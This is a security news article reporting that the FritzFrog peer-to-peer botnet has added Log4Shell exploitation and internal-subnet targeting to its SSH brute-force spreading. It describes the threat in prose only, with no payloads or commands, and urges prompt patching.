Akamai researchers have detected a botnet malware that has been updated to use the Log4Shell vulnerability as an infection vector. This new method supplements the botnet’s usual remote login brute force technique. The botnet in question is known as FritzFrog and was first documented in 2020. The Log4Shell vulnerability, also tracked as CVE-2021-44228, gained widespread attention in late 2021 when a flaw was identified in the widely used Apache Log4J 2 Java library. The FritzFrog botnet operators have been exploiting the fact that system administrators tend to give lower priority to patching internal network machines, compared to internet-facing applications which are more obvious priorities for patching. FritzFrog specifically looks for subnets and targets possible addresses within them. This means that even if high-profile internet-facing applications have been patched, a breach of any asset in the network by FritzFrog can still expose unpatched internal assets to exploitation.
The specific method the botnet uses to trigger the Log4Shell vulnerability involves forcing an application to log data containing a malicious payload. This payload then forces the Java application to connect to a server controlled by the attacker and download a malware binary. Researchers have described FritzFrog as a “new generation” botnet due to its use of a proprietary peer-to-peer protocol to spread across SSH servers worldwide.
According to Akamai, FritzFrog still uses brute force techniques to infect SSH servers, but it now also attempts to identify specific SSH targets by enumerating several system logs on each of its victims. This represents a concerning evolution of the botnet’s capabilities and highlights the ongoing threat that it poses to both internet-facing and internal network machines.
The expansion of FritzFrog’s capabilities to exploit the Log4Shell vulnerability underscores the widespread impact of this critical flaw in the Apache Log4J 2 library. The U.S. public and private sector security experts have previously warned that patching every vulnerable Log4j instance could take a decade or longer. This highlights the urgency of addressing and patching vulnerabilities such as Log4Shell to prevent them from being exploited by malicious actors.
The ongoing evolution and adaptation of botnets like FritzFrog serve as a reminder of the constantly changing and dynamic threat landscape that organizations and individuals face in the digital realm. It is essential for organizations to prioritize and maintain robust cybersecurity measures to defend against these evolving threats and protect sensitive data and systems from compromise.
Overall, the detection of botnet malware updated to exploit the Log4Shell vulnerability serves as a stark reminder of the importance of prioritizing cybersecurity and promptly addressing critical vulnerabilities to prevent them from being exploited by malicious actors. This ongoing threat underscores the need for continued vigilance and proactive measures to defend against evolving cybersecurity threats in an increasingly interconnected digital environment.